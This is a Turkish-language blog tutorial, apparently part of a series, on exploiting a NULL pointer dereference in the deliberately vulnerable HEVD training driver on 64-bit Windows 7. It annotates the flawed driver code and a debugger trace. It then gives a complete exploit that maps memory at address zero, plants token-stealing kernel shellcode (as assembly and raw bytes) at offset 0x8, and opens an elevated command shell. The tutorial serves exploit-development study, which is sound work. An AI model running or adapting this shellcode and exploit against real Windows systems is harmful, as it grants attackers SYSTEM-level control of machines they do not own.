Serinin ikinci yazısından tüm okuyuculara selamlar. Önceki yazıda bahsi geçen yazı dizisinin bu ikinci yazısında NULL değerine sahip bir gösterici çağırıldığında ortaya çıkan bir zafiyet türünü inceleyip “exploit” geliştireceğiz. Bu yazıda da tıpkı öncekinde olduğu gibi ilerleyelim, o halde öncelikle zafiyete sebep olan kısmı bi görelim…

Zafiyetin Analizi

Öncelikle bu NULL gösterici çağırımı denen zafiyet nedir? Ne durumda oluşur? Bundan nasıl faydalanabiliriz sorularına çok kısa değinelim. Adından da anlaşılabileceği gibi NULL gösterici çağırımı demek bir kod parçasındaki geliştirici hatasından kaynaklanan bir durumdan ötürü çekirdekte NULL yani 0 adresi çağırılıp çalıştırılır, bu çağırılan adreste normal şartlar altında zararlı bir şey yapacak bir kod parçası yoktur, bırakın zararlıyı zaten hiçbir şey yoktur. Fakat bu zafiyet, ya eğer birileri oraya bir şeyler koyarsa ne olur diye düşünülerek gerçekleştirilen bir saldırıdır. Çook eski bir zafiyet türü olduğu için güncel Windows sürümlerinde bu zafiyet bildiğim kadarıyla çekirdek modunda çalışmıyor (Birtakım yöntemler yine de mevcut). Misal, Windows 8’den itibaren hafıza alanındaki ilk 64 kilobaytlık hafıza alanından hafıza tahsis işleminin gerçekleştirilmesini yasakladılar. Dolayısıyla “exploit” geliştiricileri bu adreste hafıza ayıramadıkları için zararlı işlemi gerçekleştirecek kodu da oraya koyamıyorlar (Biz zararlı diyoruz tabi ama onlara göre bu gayet de yararlı bir şey hehe).

Bu koruma önlemi NULL gösterici çağırımları sonucunda yetki yükseltme yapmayı engelledi fakat hala daha sistemin çökmesini tabi engelleyemiyorlar. E malum, her şeyi Windows çekirdeğinden beklememek lazım biraz da geliştiricilerin bilinçli olup yazdıkları kodlara dikkat etmeleri gerekiyor… Bu arada, bu koruma NTVDM(DOS uygulamalarının güncel sürümlerde desteklenebilmesi için kullanılan bi mekanizma) aktif edildiğinde devre dışı kalıyor fakat güncel Windows sürümlerinde NTVDM varsayılan olarak kapalı geliyor.

Zafiyetli sürücümüzde bu zafiyeti tetiklememiz için ihtiyacımız olan IOCTL kodumuz bu defa 0x22202B (HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE). Bu zafiyetin tetiklenmesine vesile olacak ilk fonksiyonumuz şu şekilde:

; NTSTATUS __fastcall NullPointerDereferenceIoctlHandler(PIRP Irp, PIO_STACK_LOCATION IrpSp))
NullPointerDereferenceIoctlHandler proc near
	sub   rsp, 28h
	mov   rcx, [rdx+20h]      -> UserBuffer
	mov   eax, STATUS_UNSUCCESSFUL -> Geri dönüş değeri
	test  rcx, rcx
	jz   short FAILED
	call  TriggerNullPointerDereference
FAILED:              
	add   rsp, 28h
	retn
NullPointerDereferenceIoctlHandler endp

Öncekinden tek farkı bu defa iki adet parametre yok da, sadece bir tane var. O da zaten direk yine kullanıcı modundan bize ulaşıyor. Peki, TriggerNullPointerDereference fonksiyonu ne yapıyor bu veri ile ona bakalım hemen.

	...
	...
	mov   rbx, rcx    	; rcx, kullanıcı modundan gelen veri
	...
	lea   r8d, [rsi+8]  	; Hizalama
	lea   r12d, [rsi+10h]
	mov   rdx, r12    	; Boyut
	call  ProbeForRead      ; Kullanıcı modu ve okuyabiliyor muyuz?
	mov   r8d, 'kcaH'   	; Tanımlayıcı etiket
	mov   rdx, r12    	; Boyut
	xor   ecx, ecx    	; NonPagedPool
	call  ExAllocatePoolWithTag  ; Bir sey icin alan ayır
	mov   rdi, rax        ; Ayrılan alan -> rdi ve rax yazmaçlarında
	cmp   rax, rsi        ; rsi = 0, rax da 0 mı? Eğer sıfırsa, alan ayıramadık
	jnz   short TAHSIS_TAMAM
	...
	...
TAHSIS_TAMAM:              ; 0 değil, alan ayırdık
    ...
    mov   ebx, [rbx]       ; kullanıcı modundaki verinin ilk 4 baytını ebx'e al
    ...
	mov   r11d, 0BAD0B0B0h    ; r11d yazmacına 0xBAD0B0B0 değerini koy
	cmp   ebx, r11d        ; kullanıcı modundan gelen veri ile eşleşiyor mu?
	jnz   short IMZA_YOK     ; eşleşmiyor, o zaman istekte sıkıntı var çık
	mov   [rdi], r11d       ; ayrılan alanın en başına bu imzayı koy
	lea   rax, NullPointerDereferenceObjectCallback ; rax = NullPointerDereferenceObjectCallback
	mov   [rdi+8], rax      ; ikinci elemanı NullPointerDereferenceObjectCallback adresi yap
	...
	jmp   short CAGIR
	...
IMZA_YOK:                
	mov   edx, 6B636148h 	; Tanımlayıcı Etiket
	mov   rcx, rdi    	; Tahsis edilen adres
	call  ExFreePoolWithTag
	mov   rdi, rsi        ; rdi = 0 oldu, yani ayrılan alan = NULL yapıldı
CAGIR:                 
    ...
	call  qword ptr [rdi+8] -> AyrılanVeri->Fonksiyon()
	jmp   short CIKIS
	...

Evet mümkün olduğunca koddaki göz ardı edilebilir kısımları kaldırıp yorumlarla destekleme çalıştım. Kısaca özetlemek gerekirse fonksiyonumuza kullanıcı modundan bir veri geliyor, fonksiyon öncelikle kullanıcının gönderdiği veri alanını okuyup okuyamadığını test ediyor (ProbeForRead), devamında ExAllocatePoolWithTag fonksiyonuyla devamında kullanmak üzere bir hafıza alanı ayırıyor, eğer alan ayırma işlemi başarısız olursa fonksiyon geri dönüyor, eğer başarılı olursa öncelikle kullanıcının gönderdiği verinin ilk elemanının dört baytını okuyor, eğer bu okuduğu değer 0xBAD0B0B0 ise bu isteğin geçerli bir istek olduğunu anlıyor ve ayırdığı alanın ilk elemanına bu değer, ikinci alanına ise NullPointerDereferenceObjectCallback fonksiyonun adresini koyuyor, devamında gidip ikinci alana koyduğu fonksiyonu çağırıp çalıştırıyor (Bu fonksiyona takılmayın, yalnızca bir mesaj yazdırıyor). Eğer ki kullanıcı modunda gelen veriyi doğrulayamazsa, bu defa ayırdığı hafıza alanını serbest bırakıp bu alanın adresini tutan değişkeni de NULL yapıyor. Buraya kadar her şey güzel, peki sıkıntı ney? Şu, normal şartlar altında elbette ki ayırdığınız alanı serbest bıraktıktan sonra oradan bir veri çağırmaya çalışmazsınız, bu fonksiyon beklediğimiz gibi çalışmıyor artık hata geri döndürmenin zamanı geldi diye düşünürsünüz değil mi? Ama burada çağırılıyor. Çağırıldığı için çekirdek gidip 0x0 + 0x8 adresinine dallanmaya çalışıyor fakat orada bir şey olmadığı için başarısız oluyor.

Bu örnek size biraz absürd gelebilir, hade lan bunu yapan kaldı mı diye tepki verebilirsiniz, fakat NULL gösterici çağırma örneği(ve diğer bir çok zafiyet türü) illa bu koddaki mimari ile tetiklenecek diye bir şey yok. Adamın çalışan 10 bin satır kodu var, eğer biraz da düzensiz kod yazıyorsa böyle durumlarla karşılaşma olasılığı oldukça artıyor. Hatta ben size şöyle söyleyim, şu anda bile bilgisayarınızda kullandığınızı tahmin ettiğim bir güvenlik yazılımında, bir de sanallaştırma yazılımında bu ve daha da kritiği olan zafiyetler mevcut. İdareye yazdık açıkları kapayın dedik ama pek takan olmadı hehe…

Şimdi daha da netleştirmek için C kodunu görelim:

NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
  ULONG UserValue = 0;
  ULONG MagicValue = 0xBAD0B0B0;
  NTSTATUS Status = STATUS_SUCCESS;
  PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

  __try {
  	//
    // Bize gelen veriyi kontrol et, okunuyor mu ve
    // kullanıcı modunda mı?
    //
    ProbeForRead(UserBuffer,
           sizeof(NULL_POINTER_DEREFERENCE),
           (ULONG)__alignof(NULL_POINTER_DEREFERENCE));

    //
    // Veri yapımız icin alan ayir
    //
    NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
                 ExAllocatePoolWithTag(NonPagedPool,
                            sizeof(NULL_POINTER_DEREFERENCE),
                            (ULONG)POOL_TAG);
    //
    // Ayıramadın mı :(
    //
    if (!NullPointerDereference) {
      DbgPrint("[-] Unable to allocate Pool chunk\n");

      Status = STATUS_NO_MEMORY;
      return Status;
    }

    //
    // Kullanıcı modundan veriyi oku
    //
    UserValue = *(PULONG)UserBuffer;

    //
    // Gelen veri açıl susam açıl mı?
    //
    if (UserValue == MagicValue) {
    	//
    	// Evet, veri yapımızı doldur o zaman
    	//
      NullPointerDereference->Value = UserValue;
      NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;
    }
    else {
    	//
    	// Hayır değil :( O zaman ayırdığımız alanı geri ver
    	//
      ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

      //
      // Alanımızı gösteren değişkeni NULL yap (DIKKAT!)
      //
      NullPointerDereference = NULL;
    }

#ifdef SECURE
    //
    // Güvenli: Normalde kodun böyle olması gerekir, zira ayırdığınız
    // alan ile, o alanda yapacağınız işlem arasında çoook fazla
    // başka işlemler olabilir, o nedenle bu alan harbiden var mı
    // diye kontrol etmek çok çok iyi bir fikir
    //
    if (NullPointerDereference) {
    	//
    	// Evet, alan var, çağır o zaman fonksiyonumuzu!
    	// NOT: Burada her ne kadar bu değişken 0'dan farklı mı diye
    	// kontrol etsek de, aslında yine de kod patlayabilir. Neden?
    	// Çünkü yukarıda ExFreePoolWithTag'den sonra eğer değişkeni
    	// NULL yapmazsanız, bu defa da içerisinde bir şey olmayan
    	// bir adresi çağırırsınız...
    	//
      NullPointerDereference->Callback();
    }
#else
		//
    // Güvensiz: Al işte. Değişken hala var mı yok mu kimsenin 
    // umurunda değil, direkt gidip fonksiyonu çağırmış. Eee, o zaman
    // olacaklara katlanacak demektir.
    //
    NullPointerDereference->Callback();
#endif
  } __except (EXCEPTION_EXECUTE_HANDLER) {
    Status = GetExceptionCode();
  }

  return Status;
}

Evet, sanıyorum yorumlar ile birlikte gayet anlaşılır olmuştur. Yine de işin mantığında kafanıza yatmayan bir yer olursa yorumlarda sormaktan çekinmeyin. Çünkü zafiyetin neden meydana geldiğini tam olarak dimağlara yediremezsek, geri kalan her şey biraz havada kalıyor… Neyse, şimdi o zaman hemen işin karanlık taraflarına geçelim ve ufak ufak “exploit“i oluşturmaya başlayalım.

Zafiyetin Tetiklenmesi

Yukarıdaki koddan anladığımız kadarıyla zafiyeti tetiklemek istiyorsak çekirdek moduna göndereceğimiz veride, sürücünün aradığı 0xBAD0B0B0 dışında bir şey olması gerekiyor. Bu olduğu zaman kullanmak için ayırdığı alanı serbest bırakıp, bu alanı gösteren göstericiyi NULL yapacak, fakat sonrasında yine de gidip buradan bir fonksiyon göstericisi çağırmaya çalışacak. Bu nedenle de uygulama çökecek. O halde hemen doğrulayalım bakalım sahiden çökecek mi?

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x80A, METHOD_NEITHER, FILE_ANY_ACCESS)

int main()
{
	BOOL Result       = FALSE;
	DWORD Retval      = 0;
	ULONG SahteVeri	    = 0xBEBEB000; // Dikkat, beklediği değer değil farklı bi değer gönderiyoruz
	HANDLE hDeviceHandle  = INVALID_HANDLE_VALUE;
	const WCHAR* DeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver";

	printf("*** Cekirdegi Kitliyoruz - NULL gosterici cagirimi ***\n");

	//
	// Surucuye tutamak al
	//
	hDeviceHandle = CreateFile(
		DeviceName,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if(hDeviceHandle == INVALID_HANDLE_VALUE)
	{
		printf("Surucuye tutamak alamiyoruz?!\n");
		goto RETURN;
	}

	printf("Hop, tutamak geldi : %p\n", hDeviceHandle);

	Result = DeviceIoControl(
		hDeviceHandle,
		HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE,
		&SahteVeri,
		sizeof(SahteVeri),
		NULL,
		0,
		&Retval,
		NULL);

  printf("Evet, emaneti yolladik! Sonuc : %d\n", Result);
	system("cmd");

RETURN:

	if(hDeviceHandle)
	{
		CloseHandle(hDeviceHandle);
	}

  return 0;
}


Kodu çalıştırmadan önce, yine Windbg ile kontrolleri yapmamızı sağlayacak yerlere bir durma noktası koyalım bakalım:

1: kd> x HEVD!Null*
	fffff880`0535fdd4 HEVD!NullPointerDereferenceIoctlHandler (struct _IRP *, struct _IO_STACK_LOCATION *)
	fffff880`0535fc48 HEVD!NullPointerDereferenceObjectCallback (void)
1: kd> bp HEVD!NullPointerDereferenceIoctlHandler
1: kd> g

Evet şimdi kodu çalıştırıp devamında Windbg ile devam edelim, beklediğimiz şey 0x8 adresinin çağırılması. Bu arada şimdi aklıma geldi, yine Windows 7 64 bit kullanıyorum, eğer bunları 32 bit Windows üzerinde denerseniz gösterici boyutları da değişecektir doğal olarak 0x4 adresini çağıracaktır aklınızda bulunsun.

3: kd> r ebx
ebx=bebeb000
3: kd> u rip
HEVD!TriggerNullPointerDereference+0x124;
	fffff880`050ebd80 ba4861636b   mov   edx,6B636148h  ; Dikkat edin, kod şu anda ayırdığı hafıza alanını geri bırakıyor
	fffff880`050ebd85 488bcf     mov   rcx,rdi
	fffff880`050ebd88 ff158ac2ffff  call  qword ptr [HEVD!_imp_ExFreePoolWithTag (fffff880`050e8018)]
	fffff880`050ebd8e 488bfe     mov   rdi,rsi     ; Ayıran alanı gösteren arkadaş 0 yapıldı!!!!!
	fffff880`050ebd91 488d0dd80e0000 lea   rcx,[HEVD! ?? ::NNGAKEGL::`string' (fffff880`050ecc70)]
	fffff880`050ebd98 e8c9b2ffff   call  HEVD!DbgPrint (fffff880`050e7066)
	fffff880`050ebd9d ff5708     call  qword ptr [rdi+8] ; NULL GÖSTERİCİ ÇAĞIRILIYOR!
	fffff880`050ebda0 eb11      jmp   HEVD!TriggerNullPointerDereference+0x157 (fffff880`050ebdb3)
...
...
...
3: kd> r
rax=0000000000000000 rbx=00000000bebeb000 rcx=e18452ce238a0000
rdx=0000000000000028 rsi=0000000000000000 rdi=0000000000000000
rip=fffff880050ebd9d rsp=fffff88005d89780 rbp=fffffa8005b9c3b0
 r8=0000000000000065 r9=0000000000000003 r10=0000000000000000
r11=fffff88005d893a0 r12=0000000000000010 r13=0000000000000000
r14=0000000000000004 r15=fffffa8005bdb001
iopl=0     nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b       efl=00000286
HEVD!TriggerNullPointerDereference+0x141:
fffff880`050ebd9d ff5708     call  qword ptr [rdi+8] ds:002b:00000000`00000008=????????????????

Evet, gördüğünüz gibi call qword ptr [rdi+8] makine kodu çalıştırıldığı sırada rdi yazmacı 0 değerini taşıyor, haliyle bu makine kodu 0x8 adresini çağırıyor. Orada da bir şey olmadığı için işletim sistemi bir istisna fırlatıyor, ve eğer yazılımı geliştiren kişi burada bir istisna işleyici kaydetmişse durumu kurtarıyor.

Exploit” Yazımı

Evet, geldik son bölümümüze. Şimdi bu zafiyeti yetkilerimizi yükseltmek için kullanacağız. Yukarıdaki örnekte ne gördük? Sürücüye 0x8 adresini çağırtabiliyoruz değil mi? O halde bu adrese bizim “Token” çalan “shellcode“umuzu koyarsak işimiz tamam demektir. Fakat bunu yapabilmek için öncelikle bu adresi kullanabilmemiz ve önceki yazıda kullandığımız “shellcode” üzerinde minik bir değişiklik yapmamız gerekiyor.

0x0 Adresinde Hafıza Alanı Ayırmak

Normal şartlar altında 0x0 adresinde hafıza ayıramıyoruz, hatta yukarıda dediğim gibi Winows 8’den sonra 0x0‘dan başlayan adres alanındaki ilk 64 kilobaytlık alanın tahsis edilmesini engellediler. Fakat bu yazıda biz Windows 7 kullandığımız için bu “exploit“i çalıştırabileceğiz. Fakat şu da var, eğer yanılmıyorsam Windows 7 çekirdeğinde de bir güncellemeden sonra aşağıda kullanacağımız fonksiyonu düzenlediler ve bu alanda hafıza tahsis etmesini engellediler. Nereden biliyorsun diye sorarsanız yazıyı yazarken Windows 7’yi son güncellemelere alayım dedim, aldığım zaman aşağıda göreceğiniz “exploit” çalışmamaya başladı. Devamında nedenini merak edip deşmeye başlayınca fonksiyonun içerisinde argüman olarak gelen taban adresinin 0x1000‘den düşük olması durumunda fonksiyon hata dönmeye başlıyordu. Dolayısıyla bir ihtimal aşağıdaki “exploit” sisteminizde çalışmayabilir fakat çalışmasa da siz bu zafiyet türünü öğrenmiş olacaksınız diye umuyorum.

Tamam, şimdi bu ayrıntıyı geçelim, eğer sistemimizde bu koruma önlemi alınmamış ise nasıl 0x0 adresinde hafıza alanı tahsis edeceğiz? Çok basit, NtAllocateVirtualMemory fonksiyonu ile. Bu fonksiyon normal şartlar altında dışarıya aktarılmamış bir fonksiyon, o nedenle tek yapmamız gereken şey fonksiyonun adresini çalışma zamanında çözüp o şekilde kullanmak. Bu fonksiyon ikinci parametresi olarak hafıza tahsisinin yapılacağı adresi istiyor, eğer NULL verilirse adresi kendi belirliyor, fakat eğer verilmez ise o adreste hafıza tahsis etmeye çalışıyor. Bu adrese 0 yazdığımızda istediğimizi elde edemiyoruz fakat eğer 1, 2, veya 3 gibi minik bir değer yazarsak, fonksiyon kendi içerisinde bu adres başlangıcını aşağıya doğru, sayfa boyutuna göre yuvarlama işleminden geçiriyor. Bu sayede biz mesela 1 adresini girersek, bu 0 değerine yuvarlanıyor. Böylece 0x0 adresinde hafıza tahsisi gerçekleştirmiş oluyoruz. Devamında ise yapmamız gereken tek şey, bu hafıza alanının 0x8 uzaklığına yetki yükseltme işlemini yapacak olan “shellcode“‘u eklemek…

Kullanacağımız hafıza tahsis fonksiyonunun ilk örneği şu şekilde:

typedef NTSTATUS (WINAPI *p_NtAllocateVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG_PTR ZeroBits,
	PSIZE_T AllocationSize,
	ULONG AllocationType,
	ULONG Protect);

Devamında 0x0 adresinde hafıza tahsis etmek için fonksiyonu şu şekilde kullanıyoruz:

PVOID BaseAddress =(PVOID)1;
SIZE_T Size    = 4096;
...
...
a_NtAllocateVirtualMemory = (p_NtAllocateVirtualMemory)GetProcAddress(
	GetModuleHandleA("ntdll.dll"),
	"NtAllocateVirtualMemory");
if (a_NtAllocateVirtualMemory == NULL)
{
	printf("Fonksiyonun adresini alamadik :(\n");
	goto RETURN;
}
NtStatus = a_NtAllocateVirtualMemory(
		GetCurrentProcess(),
		&BaseAddress,
		0,
		&Size,
		MEM_COMMIT | MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);

if(NtStatus != STATUS_SUCCESS)
{
	printf("Alan ayiramadik : %x :(\n", NtStatus);
	goto RETURN;
}

//
// 0x0 + 0x8 uzaklığına, bizim "token" çalan "shellcode"umuzu koy
//
*(unsigned long long*)0x8 = (unsigned long long)&cakal;
...
...

Shellcode“‘da Minik Düzeltme

Hatırlarsanız önceki “exploit“imizin sonunda sistemin çökmeden çalışmaya devam edebilmesi için yığını temizleyen bir komut koymuştuk. Şimdiki örneğimizde “shellcode“umuzda değişen tek şey artık buna ihtiyaç olmaması. Nedeni gayet basit, zira artık yığını bozmuyoruz, çalışma nasıl gerekiyorsa o şekilde dışarıdan bir müdahale olmadan devam ediyor. Bu nedenle gerekli temizlikleri fonksiyonun kendisi zaten yapıyor, dolayısıyla bizim ek bir şey yapmamıza gerek yok. Netice olarak bu defa kullanacağımız “shellcode“muz şu şekilde:

[BITS 64]

%define SYSTEM_PID 0x4
%define TOKEN_OFFSET 0x80
%define KTHREAD_OFFSET 0x188
%define EPROCESS_OFFSET 0x70
%define PROCESSLIST_OFFSET 0x188
%define CURRENTPROC_OFFSET 0x208

;------------------------------------------------------------------------------
  push rax              ; rax yazmacını yigina yedekle (geri donus degeri)
  mov rdx, [gs:KTHREAD_OFFSET]    ; Çalışan işlemciğin KTHREAD veri yapısı
  mov r11, [rdx + EPROCESS_OFFSET]  ; r11 = Şimdiki İşlemin EPROCESS yapisi
  mov r10, [r11 + PROCESSLIST_OFFSET] ; r10 = ActiveProcessLinks (LIST_ENTRY)
  mov rcx, [r10]           ; rcx = ListEntry->Next, yani sonraki EPROCESS
sistemi_bul:
  mov rdx, [rcx - 8]         ; rdx = İncelenen işlemin belirteci 
  cmp rdx, SYSTEM_PID         ; 4 mü?
  jz bulundu             ; eveeet!
  mov	rcx, [rcx]           ; değil, rcx = ListEntry->Next
  jmp sistemi_bul           ; yukarı kaç
bulundu:
  mov rax, [rcx + TOKEN_OFFSET]    ; Aha! Sistem geldi, Token adresini al
  and al, 0xf0            ; İşimize yaramayan son 4 biti sıfırla
bizi_yukselt:
  mov [r11 + CURRENTPROC_OFFSET], rax ; Bizim işlemin "Token"inin yerine koy
cikis:
  pop rax               ; rax yazmacini geri al
  ret                 ; Geldiğin yere geri dön

Bu arada, burada aslında rax yazmacını en başta yedekleyip tekrar geri almaktansa, direkt olarak xor rax, rax yapıp sıfırlamak daha mantıklı olabilir (0 = STATUS_SUCCESS). Malum, rax değişkeni fonksiyonun durum bilgisini geri dönüyor, kodda en başta bu başarılı diye tanımlandığı için ben oraya dokunmadım fakat dilerseniz az önce bahsettiğim şekilde de yapabilirsiniz.

Sonuç olarak bu zafiyeti “exploit” edecek kodumuzun son hali şu şekilde:

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x80A, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef NTSTATUS (WINAPI *p_NtAllocateVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG_PTR ZeroBits,
	PSIZE_T AllocationSize,
	ULONG AllocationType,
	ULONG Protect);

int main()
{
	BOOL Result       = FALSE;
	NTSTATUS NtStatus    = STATUS_UNSUCCESSFUL;
	DWORD Retval      = 0;
	ULONG SahteVeri     = 0xBEBEB000;
	HANDLE hDeviceHandle  = INVALID_HANDLE_VALUE;
	p_NtAllocateVirtualMemory a_NtAllocateVirtualMemory = NULL;
	const WCHAR* DeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver";

	PVOID BaseAddress =(PVOID)1;
	SIZE_T Size    = 4096;

	printf("*** Cekirdegi Kitliyoruz - NULL gosterici cagirimi ***\n");

	//
	// "Token" calan parcacik
	//
	unsigned char cakal[57] = {
		0x50, 0x65, 0x48, 0x8B, 0x14, 0x25, 0x88, 0x01, 0x00, 0x00, 0x4C, 0x8B,
		0x5A, 0x70, 0x4D, 0x8B, 0x93, 0x88, 0x01, 0x00, 0x00, 0x49, 0x8B, 0x0A,
		0x48, 0x8B, 0x51, 0xF8, 0x48, 0x83, 0xFA, 0x04, 0x74, 0x05, 0x48, 0x8B,
		0x09, 0xEB, 0xF1, 0x48, 0x8B, 0x81, 0x80, 0x00, 0x00, 0x00, 0x24, 0xF0,
		0x49, 0x89, 0x83, 0x08, 0x02, 0x00, 0x00, 0x58, 0xC3
	};

	//
	// Parcacigin alanini calistirilabilir yap
	//
	DWORD oldProtect;
	VirtualProtect(cakal, sizeof(cakal), PAGE_EXECUTE_READWRITE, &oldProtect);

	//
	// Surucuye tutamak al
	//
	hDeviceHandle = CreateFile(
		DeviceName,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if(hDeviceHandle == INVALID_HANDLE_VALUE)
	{
		printf("Surucuye tutamak alamiyoruz?!\n");
		goto RETURN;
	}

	printf("Hop, tutamak geldi : %p\n", hDeviceHandle);

	//
	// '0' adresini hazırla
	//
	a_NtAllocateVirtualMemory = (p_NtAllocateVirtualMemory)GetProcAddress(
		GetModuleHandleA("ntdll.dll"),
		"NtAllocateVirtualMemory");
	if (a_NtAllocateVirtualMemory == NULL)
	{
		printf("Fonksiyonun adresini alamadik :(\n");
		goto RETURN;
	}

	//
	// Alan ayır, BaseAddress değeri olarak kullandığımız 1, 0'a düşürülecek hizalama
	// olayının sağlanabilmesi için
	//
	NtStatus = a_NtAllocateVirtualMemory(
		GetCurrentProcess(),
		&BaseAddress,
		0,
		&Size,
		MEM_COMMIT | MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);

	if(NtStatus != STATUS_SUCCESS)
	{
		printf("Alan ayiramadik : %x :(\n", NtStatus);
		goto RETURN;
	}

	//
	// 0x0 + 0x8 uzaklığına, bizim "token" çalan "shellcode"umuzu koy
	//
	*(unsigned long long*)0x8 = (unsigned long long)&cakal;

	//
	// Hadi (b)akalım :P
	//
	Result = DeviceIoControl(
		hDeviceHandle,
		HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE,
		&SahteVeri,
		sizeof(SahteVeri),
		NULL,
		0,
		&Retval,
		NULL);

    printf("Evet, emaneti yolladik! Sonuc : %d\n", Result);
	system("cmd");

RETURN:

	if(hDeviceHandle)
	{
		CloseHandle(hDeviceHandle);
	}

  return 0;
}

Kodu derleyip çalıştırdığınızda, önceki yazımızda olduğu gibi yetkileri yükseltilmiş bir komut satırı sizi bekliyor olacak. Tabii dediğim gibi eğer sisteminizde bu zafiyet türünü engelleyen önlem yok ise. Olduuukça eski bir zafiyet olduğu için zaten günümüzde hâlâ buradan ekmek yenmesi insanı biraz şaşırtıyor fakat tüm o önlemlere rağmen yine de bu tür zafiyetlerden faydalanmak mümkün olabiliyor.

Sevgiler